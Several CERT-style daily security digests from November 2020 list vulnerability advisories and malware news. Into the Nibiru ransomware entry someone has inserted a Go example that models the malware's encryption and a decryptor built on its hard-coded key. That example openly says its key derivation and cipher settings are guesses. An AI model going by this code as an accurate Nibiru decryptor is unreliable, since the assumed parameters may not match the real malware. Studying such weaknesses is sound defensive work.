[...] This article focuses on the known malware strains that have been used over the past two years to install ransomware. [...] Once any of these malware strains are detected, system administrators should drop everything, take systems offline, and audit and remove the malware as a top priority. ZDNet will keep the list up to date going forward.
---------------------------------------------
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-…
∗∗∗ Exploiting dynamic rendering engines to take control of web apps ∗∗∗
---------------------------------------------
tl;dr:
- Dynamic rendering is a technique used to serve prerendered web site pages to crawlers (e.g., Google search engine, Slack or Twitter bots, etc.)
- The most popular open source applications for dynamic rendering are Rendertron and Prerender; both of which may introduce vulnerabilities to a network if used improperly.
---------------------------------------------
https://r2c.dev/blog/2020/exploiting-dynamic-rendering-engines-to-take-cont…
∗∗∗ Consul by HashiCorp: from Infoleak to RCE ∗∗∗
---------------------------------------------
Consul is a software first released in 2014 for DNS-based service discovery. It provides distributed key-value storage, segmentation, and configuration. Registered services and nodes can be queried using a DNS interface or an HTTP interface. [...] An attacker can use public access to the system to obtain information about the infrastructure and its configuration.
---------------------------------------------
https://lab.wallarm.com/consul-by-hashicorp-from-infoleak-to-rce/
∗∗∗ WordPress Malware Setting Up SEO Shops ∗∗∗
---------------------------------------------
While recently looking over my honeypots, I discovered an infection where a malicious actor added a storefront on top of my existing WordPress installation. For background, this particular honeypot is a full instance of WordPress running on a Docker image. The administrator credentials are intentionally weak, in order to give those with malicious intent easy access. This way I can examine what attacks the vulnerable site will undergo and what the login access will be used for.
---------------------------------------------
https://blogs.akamai.com/sitr/2020/11/wordpress-malware-setting-up-seo-shop…
∗∗∗ Purgalicious VBA: Macro Obfuscation With VBA Purging ∗∗∗
---------------------------------------------
Malicious Office documents remain a favorite technique for every type of threat actor, from red teamers to FIN groups to APTs. In this blog post, we will discuss "VBA Purging", a technique we have increasingly observed in the wild and that was first publicly documented by Didier Stevens in February 2020.
---------------------------------------------
http://www.fireeye.com/blog/threat-research/2020/11/purgalicious-vba-macro-…
∗∗∗ Demystifying two common misconceptions with e-commerce security ∗∗∗
---------------------------------------------
HTTPS and iframe containers augment security, but are not a panacea for online shoppers and merchants.
---------------------------------------------
https://blog.malwarebytes.com/cybercrime/2020/11/demystifying-two-common-mi…
∗∗∗ Caution: numerous fake shops advertise Black Friday deals ∗∗∗
---------------------------------------------
In one week the time has come: Black Friday makes bargain hunters' hearts beat faster. Starting Monday, Cyber Week begins, during which consumers can already enjoy discounts from online retailers ahead of Black Friday. But be careful when hunting for bargains. At this time of year, it is not only online retailers who do good business, but fraudsters too.
---------------------------------------------
https://www.watchlist-internet.at/news/vorsicht-zahlreiche-fake-shops-werbe…
∗∗∗ IAMFinder: Open Source Tool to Identify Information Leaked from AWS IAM Reconnaissance ∗∗∗
---------------------------------------------
IAMFinder is a custom open-source tool that can identify users and IAM roles in AWS accounts, showing where to harden IAM configurations.
---------------------------------------------
https://unit42.paloaltonetworks.com/iamfinder/
=====================
= Vulnerabilities =
=====================
∗∗∗ About the security content of macOS Big Sur 11.0.1 ∗∗∗
---------------------------------------------
The macOS Big Sur 11.0.1 software update is available for Mac mini (M1, 2020), MacBook Air (M1, 2020), and MacBook Air (13-inch, 2020), and together with macOS 11.0 includes the security content listed in this advisory.
---------------------------------------------
https://support.apple.com/en-us/HT211982
∗∗∗ VMSA-2020-0026 VMware ESXi, Workstation and Fusion updates address use-after-free and privilege escalation vulnerabilities (CVE-2020-4004, CVE-2020-4005) ∗∗∗
---------------------------------------------
Multiple vulnerabilities in VMware ESXi, Workstation and Fusion were privately reported to VMware. Updates are available to remediate these vulnerabilities in affected VMware products.
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2020-0026.html
∗∗∗ VMSA-2020-0023 Updates ∗∗∗
---------------------------------------------
Updated security advisory to add Workstation 15.x version in the response matrix of section 3(c) and 3(d).
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2020-0023.html
∗∗∗ VMSA-2020-0020 Updates ∗∗∗
---------------------------------------------
Updated security advisory to add Fusion 11.x version in the response matrix of section 3(a) and Workstation 15.x version in the response matrix of section 3(b), 3(c) & 3(d).
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2020-0020.html
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by CentOS (firefox), Fedora (chromium, microcode_ctl, mingw-libxml2, seamonkey, and xen), openSUSE (slurm_18_08 and tor), Oracle (thunderbird), SUSE (buildah, firefox, go1.14, go1.15, krb5, microcode_ctl, perl-DBI, podman, postgresql12, thunderbird, ucode-intel, wireshark, wpa_supplicant, and xen), and Ubuntu (firefox and phpmyadmin).
---------------------------------------------
https://lwn.net/Articles/837915/
∗∗∗ CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance ∗∗∗
---------------------------------------------
A vulnerability has been identified in Citrix Application Delivery Controller (ADC), formerly known as NetScaler ADC, and Citrix Gateway, formerly known as NetScaler Gateway, that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.
---------------------------------------------
https://support.citrix.com/article/CTX267027
∗∗∗ Security Bulletin: Cryptographic Vulnerability Affects Map Editor in IBM Sterling B2B Integrator (CVE-2020-4937) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cryptographic-vulnerabili…
∗∗∗ Security Bulletin: Vulnerability CVE-2020-4788 in the IBM Power9 processor affects IBM i ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-cve-2020-47…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect Rational Business Developer ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Publicly disclosed vulnerabilities from Kernel affect IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
∗∗∗ Security Bulletin: InfoSphere Master Data Management 11.6 affected due to vulnerability in OpenSSL ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-infosphere-master-data-ma…
∗∗∗ Security Bulletin: IBM® Db2® could allow a local authenticated attacker to execute arbitrary code on the system, caused by DLL search order hijacking vulnerability in Microsoft Windows client. (CVE-2020-4739) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-could-allow-a-loc…
∗∗∗ Security Bulletin: IBM has released AIX and VIOS iFixes in response to a vulnerability in IBM POWER9 (CVE-2020-4788) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-has-released-aix-and-…
∗∗∗ Security Bulletin: IBM SDK, Java Technology Edition Quarterly CPU – Apr 2020 – Includes Oracle Apr 2020 CPU minus CVE-2020-2773 affects IBM MQ ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-sdk-java-technology-e…
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 18-11-2020 18:00 − Thursday 19-11-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Android chat app with 100 million installs exposes private messages ∗∗∗
---------------------------------------------
GO SMS Pro, an Android instant messaging application with over 100 million installs, is publicly exposing private multimedia files shared between its users.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/android-chat-app-with-100-mi…
∗∗∗ CodeQL: GitHub finds security vulnerability in Corona-Warn-App server ∗∗∗
---------------------------------------------
GitHub's security team has found a remote code execution vulnerability in the server code of the Corona-Warn-App.
---------------------------------------------
https://www.golem.de/news/codeql-github-findet-sicherheitsluecke-in-corona-…
∗∗∗ Egregor ransomware bombards users with printed ransom notes ∗∗∗
---------------------------------------------
The cybercriminals used this tactic for the first time in an attack on a Chilean retail group. They do not limit themselves to office printers and even print their ransom demand on receipt printers. It is unclear how the hackers do this.
---------------------------------------------
https://www.zdnet.de/88389908/egregor-ransomware-bombardiert-nutzer-mit-ged…
=====================
= Vulnerabilities =
=====================
∗∗∗ Drupal core - Critical - Remote code execution - SA-CORE-2020-012 ∗∗∗
---------------------------------------------
Drupal core does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting [...]
---------------------------------------------
https://www.drupal.org/sa-core-2020-012
∗∗∗ SAML SP 2.0 Single Sign On (SSO) - SAML Service Provider - Critical - Access bypass - SA-CONTRIB-2020-038 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2020-038
∗∗∗ Ink Filepicker - Critical - Unsupported - SA-CONTRIB-2020-037 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2020-037
∗∗∗ Media: oEmbed - Critical - Remote Code Execution - SA-CONTRIB-2020-036 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2020-036
∗∗∗ Examples for Developers - Critical - Remote Code Execution - SA-CONTRIB-2020-035 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2020-035
∗∗∗ VMware SD-WAN Orchestrator updates address multiple security vulnerabilities ∗∗∗
---------------------------------------------
Multiple vulnerabilities in SD-WAN Orchestrator were privately reported to VMware. Patches and workarounds are available to remediate or work around these vulnerabilities in affected VMware products. VMware-hosted SD-WAN Orchestrators have been patched for these issues.
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2020-0025.html
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (chromium and firefox), CentOS (bind, curl, fence-agents, kernel, librepo, libvirt, microcode_ctl, python, python3, qt and qt5-qtbase, resource-agents, and tomcat), Debian (drupal7, firefox-esr, jupyter-notebook, packer, python3.5, and rclone), Fedora (firefox), Mageia (firefox, nss), openSUSE (gdm, kernel-firmware, and moinmoin-wiki), Oracle (net-snmp), SUSE (libzypp, zypper), and Ubuntu (c-ares).
---------------------------------------------
https://lwn.net/Articles/837767/
∗∗∗ ICS Advisory (ICSA-20-324-03) Real Time Automation EtherNet/IP ∗∗∗
---------------------------------------------
The affected product is vulnerable to a stack-based buffer overflow, which may allow an attacker to send a specially crafted packet that may result in a denial-of-service condition or code execution.
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsa-20-324-03
∗∗∗ Trend Micro Apex One: multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1136
∗∗∗ F5 BIG-IP: vulnerability allows bypass of security measures ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1140
∗∗∗ [webapps] Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting ∗∗∗
---------------------------------------------
https://www.exploit-db.com/exploits/49082
∗∗∗ Security Advisory - Improper Buffer Operation Restrictions Vulnerability on Huawei Smartphone ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201118-…
∗∗∗ Security Advisory - Command Injection Vulnerability in Huawei FusionCompute Product ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201118-…
∗∗∗ Security Bulletin: TLS Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam) vulnerability in IBM Cloud Pak for Data Streams ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-tls-protocol-dhe_export-c…
∗∗∗ Security Bulletin: The web server or application server are configured in an insecure way in IBM Cloud Pak for Data Streams ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-the-web-server-or-applica…
∗∗∗ Security Bulletin: CVE-2020-14782 may affect IBM® SDK, Java™ Technology Edition ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-14782-may-affect…
∗∗∗ Security Bulletin: App Connect for Manufacturing 2.0 is affected by vulnerabilities of ASN.1 parser in Bouncy Castle Crypto (aka BC Java) 1.6 (CVE-2019-17359) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-for-manufactu…
∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to a buffer overflow (CVE-2020-4701) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-…
∗∗∗ Security Bulletin: Security vulnerability affects the Report Builder that is shipped with Jazz Reporting Service (CVE-2020-4718) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerability-af…
∗∗∗ Security Bulletin: Lucky 13 Attack Vulnerability in IBM Cloud Pak for Data Streams ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-lucky-13-attack-vulnerabi…
∗∗∗ Security Bulletin: Multiple vulnerabilities may affect IBM® SDK, Java™ Technology Edition ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Vulnerability in OpenSSH affects IBM Integrated Analytics System ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-openssh-…
∗∗∗ Security Bulletin: CVE-2019-17638 jetty double-release of a byte buffer ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cve-2019-17638-jetty-doub…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 17-11-2020 18:00 − Wednesday 18-11-2020 18:00
Handler: Dimitri Robl
Co-Handler: Robert Waldner
=====================
= News =
=====================
∗∗∗ When Security Controls Lead to Security Issues, (Wed, Nov 18th) ∗∗∗
---------------------------------------------
The job of security professionals is to protect customers' assets and, even more so today, customers' data. The security landscape is full of solutions that help to improve security by detecting (and blocking) threats knocking on the organization's doors. Sometimes, such solutions have side effects that go in the opposite direction and make customers more vulnerable to attacks.
---------------------------------------------
https://isc.sans.edu/diary/rss/26804
∗∗∗ Evasive Maneuvers in Data Stealing Gateways ∗∗∗
---------------------------------------------
We have already shared examples of many kinds of malware that rely on an external gateway to receive or return data, such as different malware payloads. During a recent investigation, we came across this example of a PHP script that attackers use for many different purposes. What makes the sample interesting is that alongside this PHP script we also found a few data-stealing scripts, indicating that the code might have been used to send sensitive data to the attackers.
---------------------------------------------
https://blog.sucuri.net/2020/11/evasive-maneuvers-in-data-stealing-gateways…
∗∗∗ WebNavigator Chromium browser published by search hijackers ∗∗∗
---------------------------------------------
A mystery Chromium browser recently made a sudden appearance, and is certainly proving popular. But what is it, and where did it come from?
---------------------------------------------
https://blog.malwarebytes.com/pups/2020/11/webnavigator-chromium-browser-pu…
∗∗∗ Nibiru ransomware variant decryptor ∗∗∗
---------------------------------------------
The Nibiru ransomware is a .NET-based malware family. It traverses directories on the local disks, encrypts files with Rijndael-256 and gives them a .Nibiru extension. Rijndael-256 is a secure encryption algorithm. However, Nibiru uses the hard-coded string "Nibiru" to compute the 32-byte key and the 16-byte IV, so the key material is the same for every victim and can be recomputed by anyone who knows the string. The decryptor program leverages this weakness to decrypt files encrypted by this variant.
---------------------------------------------
https://blog.talosintelligence.com/2020/11/Nibiru-ransomware.html
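The weakness the Talos summary describes, key material derived from a constant embedded in the binary, as an added Go example; this is not code from the original post or from the Talos decryptor. The derivation of the key and IV from "Nibiru" (SHA-256 and MD5 here, chosen only because they yield 32 and 16 bytes), the PKCS#7 padding and the use of AES-256-CBC in place of the .NET Rijndael call are assumptions for illustration; a real decryptor has to reproduce the malware's exact derivation and cipher parameters, which the summary does not give:

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/md5"
	"crypto/sha256"
	"errors"
	"fmt"
)

// hardcodedSecret is the constant string the Talos write-up says Nibiru
// embeds and reuses for every victim.
const hardcodedSecret = "Nibiru"

// deriveKeyIV turns the hard-coded string into a 32-byte key and a 16-byte IV.
// ASSUMPTION: the digest only states the sizes, not the derivation; SHA-256 for
// the key and MD5 for the IV are placeholders that produce those sizes. What
// makes this a weakness is that the input is constant: anyone who reads the
// string out of the binary gets the same key and IV as the malware.
func deriveKeyIV(secret string) (key []byte, iv []byte) {
	k := sha256.Sum256([]byte(secret))
	i := md5.Sum([]byte(secret))
	return k[:], i[:]
}

// pkcs7Pad pads data to a whole number of blocks (the .NET default padding).
// It copies the input so the caller's buffer is never written to.
func pkcs7Pad(data []byte, blockSize int) []byte {
	n := blockSize - len(data)%blockSize
	out := make([]byte, len(data), len(data)+n)
	copy(out, data)
	return append(out, bytes.Repeat([]byte{byte(n)}, n)...)
}

// pkcs7Unpad strips PKCS#7 padding and rejects malformed padding.
func pkcs7Unpad(data []byte, blockSize int) ([]byte, error) {
	if len(data) == 0 || len(data)%blockSize != 0 {
		return nil, errors.New("data is not a whole number of blocks")
	}
	n := int(data[len(data)-1])
	if n == 0 || n > blockSize {
		return nil, errors.New("bad padding length")
	}
	for _, b := range data[len(data)-n:] {
		if int(b) != n {
			return nil, errors.New("bad padding bytes")
		}
	}
	return data[:len(data)-n], nil
}

// encryptLikeNibiru models the malware side. AES-256-CBC (Rijndael with a
// 256-bit key and 128-bit block) stands in for the .NET Rijndael call; the
// 16-byte IV from the write-up matches that block size.
func encryptLikeNibiru(plaintext []byte) ([]byte, error) {
	key, iv := deriveKeyIV(hardcodedSecret)
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	padded := pkcs7Pad(plaintext, block.BlockSize())
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, padded)
	return out, nil
}

// decryptNibiruFile is what a decryptor does: recompute the same key and IV
// from the hard-coded string and undo CBC. Nothing from the attacker is needed.
func decryptNibiruFile(ciphertext []byte) ([]byte, error) {
	key, iv := deriveKeyIV(hardcodedSecret)
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(ciphertext) == 0 || len(ciphertext)%block.BlockSize() != 0 {
		return nil, errors.New("ciphertext is not a whole number of blocks")
	}
	out := make([]byte, len(ciphertext))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(out, ciphertext)
	return pkcs7Unpad(out, block.BlockSize())
}

func main() {
	// Constructed sample "victim file" content; not real data.
	original := []byte("quarterly-report.xlsx contents (constructed sample)")
	enc, err := encryptLikeNibiru(original)
	if err != nil {
		panic(err)
	}
	dec, err := decryptNibiruFile(enc)
	if err != nil {
		panic(err)
	}
	fmt.Printf("recovered: %q (matches original: %v)\n", dec, bytes.Equal(dec, original))
}
```

The contrast worth noting is with ransomware that generates a random per-victim key and wraps it with an attacker-held public key: there, recomputing the key offline is impossible, and a decryptor can only exist if the private key leaks. Nibiru's derivation has no secret or random input at all, which is why the files can be recovered from the binary alone.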
∗∗∗ Large-Scale Attacks Target Epsilon Framework Themes ∗∗∗
---------------------------------------------
On November 17, 2020, our Threat Intelligence team noticed a large-scale wave of attacks against recently reported Function Injection vulnerabilities in themes using the Epsilon Framework, which we estimate are installed on over 150,000 sites. So far today, we have seen a surge of more than 7.5 million attacks against more than 1.5 million sites ... For the time being, the vast majority of these attacks appear to be probing attacks, designed to determine whether a site has a vulnerable theme installed rather than to perform an exploit chain, though full Remote Code Execution (RCE) leading to site takeover is possible with these vulnerabilities.
---------------------------------------------
https://www.wordfence.com/blog/2020/11/large-scale-attacks-target-epsilon-f…
∗∗∗ Beware of COVID-19 relief funds: support payments worth millions are a scam! ∗∗∗
---------------------------------------------
For many people the corona crisis is also a financial crisis, and various support schemes are meant to help them get through this period. But beware: take a close look at who is offering you money. Fraudulent e-mails from alleged COVID-19 relief funds are currently being sent out, promising large sums of money.
---------------------------------------------
https://www.watchlist-internet.at/news/vorsicht-vor-covid-19-hilfsfonds-unt…
=====================
= Vulnerabilities =
=====================
∗∗∗ iTunes 12.11 for Windows ∗∗∗
---------------------------------------------
Foundation
Impact: A local user may be able to read arbitrary files
ImageIO
Impact: Processing a maliciously crafted image may lead to arbitrary code execution
libxml2
Impact: Processing maliciously crafted web content may lead to code execution
libxml2
Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution
WebKit
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Windows Security
Impact: A malicious application may be able to access local users' Apple IDs
---------------------------------------------
https://support.apple.com/kb/HT211933
∗∗∗ Tails 4.13: Anonymising operating system receives important security updates ∗∗∗
---------------------------------------------
The new version of the Debian-based live system includes some polish to the user interface, but above all important security fixes.
---------------------------------------------
https://heise.de/-4963955
∗∗∗ Tor Browser: Desktop version 10.0.5 with Firefox security updates available ∗∗∗
---------------------------------------------
A new version of the anonymising web browser is available for Windows, Linux and macOS. The Android edition is to follow soon.
---------------------------------------------
https://heise.de/-4964177
∗∗∗ Cisco Expressway Software Unauthorized Access Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Secure Web Appliance Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Webex Meetings API Cross-Site Scripting Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Webex Meetings and Cisco Webex Meetings Server Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Webex Meetings and Cisco Webex Meetings Server Unauthorized Audio Information Exposure Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Webex Meetings and Cisco Webex Meetings Server Ghost Join Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Integrated Management Controller Multiple Remote Code Execution Vulnerabilities ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Telepresence CE Software and RoomOS Software Unauthorized Token Generation Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco DNA Spaces Connector Command Injection Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco IoT Field Network Director Cross-Site Scripting Vulnerabilities ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco IoT Field Network Director Improper Domain Access Control Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco IoT Field Network Director Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco IoT Field Network REST API Insufficient Input Validation Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco IoT Field Network Director Unprotected Storage of Credentials Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco IoT Field Network Director File Overwrite Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco IoT Field Network Director Improper Access Control Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco IoT Field Network Director Unauthenticated REST API Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco IoT Field Network Director SOAP API Authorization Bypass Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco IoT Field Network Director Missing API Authentication Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Integrated Management Controller Multiple Remote Code Execution Vulnerabilities ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Security Advisory - Privilege Escalation Vulnerability in FusionCompute Product ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201118-…
∗∗∗ Security Bulletin: An unspecified vulnerability in Java SE or Oracle Java SE could allow an unauthenticated attacker ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-an-unspecified-vulnerabil…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect IBM Decision Optimization Center (CVE-2020-14577, CVE-2020-14578, CVE-2020-14579, CVE-2020-14621) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: App Connect Enterprise Certified Container Dashboard is vulnerable to (CVE-2020-15168) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce…
∗∗∗ Security Bulletin: IBM MQ Appliance is affected by a data corruption vulnerability (CVE-2020-4592) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-appliance-is-affec…
∗∗∗ Security Bulletin: IBM MQ is affected by a vulnerability in IBM Runtime Environment Java (deferred from Oracle Jan 2020 CPU) CVE-2020-2654 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-is-affected-by-a-v…
=====================
= End-of-Day report =
=====================
Timeframe: Montag 16-11-2020 18:00 − Dienstag 17-11-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Security flaw: Intel's secure enclave cracked with $30 worth of hardware ∗∗∗
---------------------------------------------
Intel's SGX enclave is meant to hide data even from data centre operators with physical access. Yet that is exactly how researchers were able to read out RSA keys.
---------------------------------------------
https://www.golem.de/news/sicherheitsluecke-mit-hardware-fuer-30-dollar-int…
∗∗∗ Firewall bypass in macOS 11: Malware can abuse Apple's exclusion list ∗∗∗
---------------------------------------------
Apple's own services remain invisible to local firewalls in macOS 11. Malware could phone home the same way, a security researcher warns.
---------------------------------------------
https://heise.de/-4963227
∗∗∗ Be Very Sparing in Allowing Site Notifications ∗∗∗
---------------------------------------------
An increasing number of websites are asking visitors to approve "notifications," browser modifications that periodically display messages on the user's mobile or desktop device. In many cases these notifications are benign, but several dodgy firms are paying site owners to install their notification scripts and then selling that communications pathway to scammers and online hucksters.
---------------------------------------------
https://krebsonsecurity.com/2020/11/be-very-sparing-in-allowing-site-notifi…
∗∗∗ YouTube: Fraudulent ads lure users into large investments ∗∗∗
---------------------------------------------
Bitcoin trading on dubious trading platforms is currently being advertised on YouTube. Anyone who follows the ad lands on a fake newspaper article on a fake Kronen Zeitung website. There, a completely fabricated interview with the businessman Richard Lugner explains how Bitcoin investments make you a millionaire in just a few days.
---------------------------------------------
https://www.watchlist-internet.at/news/youtube-betruegerische-werbung-verlo…
∗∗∗ Jupyter trojan: Newly discovered malware stealthily steals usernames and passwords ∗∗∗
---------------------------------------------
Morphisec researchers detail campaign that steals Chromium, Firefox, and Chrome browser data.
---------------------------------------------
https://www.zdnet.com/article/jupyter-trojan-newly-discovered-trojan-malwar…
∗∗∗ vjw0rm Leveraging New Obfuscation Technique ∗∗∗
---------------------------------------------
vjw0rm is a malicious JavaScript program capable of propagating across removable storage devices and receiving instructions from a C2 server. A SANS Internet Storm Center (ISC) researcher has identified a sample of this worm leveraging new obfuscation techniques.
---------------------------------------------
https://exchange.xforce.ibmcloud.com/collection/bfbf7b77d8cbc57d1a94e7bc291…
=====================
= Vulnerabilities =
=====================
∗∗∗ Update now: Cisco patches security flaws in its "Security Manager" ∗∗∗
---------------------------------------------
Thanks to flaws rated "High" and "Critical", Cisco's Security Manager was more of a liability than an asset to security. Software updates are now partially available.
---------------------------------------------
https://heise.de/-4962719
∗∗∗ Blind Out-Of-Band XML External Entity Injection in Avaya Web License Manager ∗∗∗
---------------------------------------------
By using an XXE injection it is possible to read confidential data like /etc/shadow or private keys. In addition, a special payload can affect the availability of the web application.
---------------------------------------------
https://sec-consult.com/en/blog/advisories/blind-out-of-band-xml-external-e…
∗∗∗ TYPO3 Extensions: Multiple vulnerabilities ∗∗∗
---------------------------------------------
A remote, authenticated attacker can exploit multiple vulnerabilities in TYPO3 extensions to disclose information or cause a denial of service.
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1127
∗∗∗ TYPO3 Core: Multiple vulnerabilities ∗∗∗
---------------------------------------------
A remote, anonymous attacker can exploit multiple vulnerabilities in TYPO3 Core to carry out cross-site scripting attacks, disclose information or bypass security measures.
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1124
∗∗∗ Trend Micro InterScan Web Security Virtual Appliance < 6.5 SP2 Hotfix 1919 ∗∗∗
---------------------------------------------
A remote, anonymous attacker can exploit multiple vulnerabilities in Trend Micro InterScan Web Security Virtual Appliance to execute arbitrary code with administrator privileges.
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1128
∗∗∗ Apple iTunes: Multiple vulnerabilities ∗∗∗
---------------------------------------------
A remote, anonymous attacker can exploit multiple vulnerabilities in Apple iTunes to execute arbitrary code with user privileges or cause a denial of service.
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1125
∗∗∗ Node.js: Vulnerability allows denial of service ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1126
∗∗∗ Trend Micro Worry-Free Business Security: Vulnerability allows bypassing of security measures ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1129
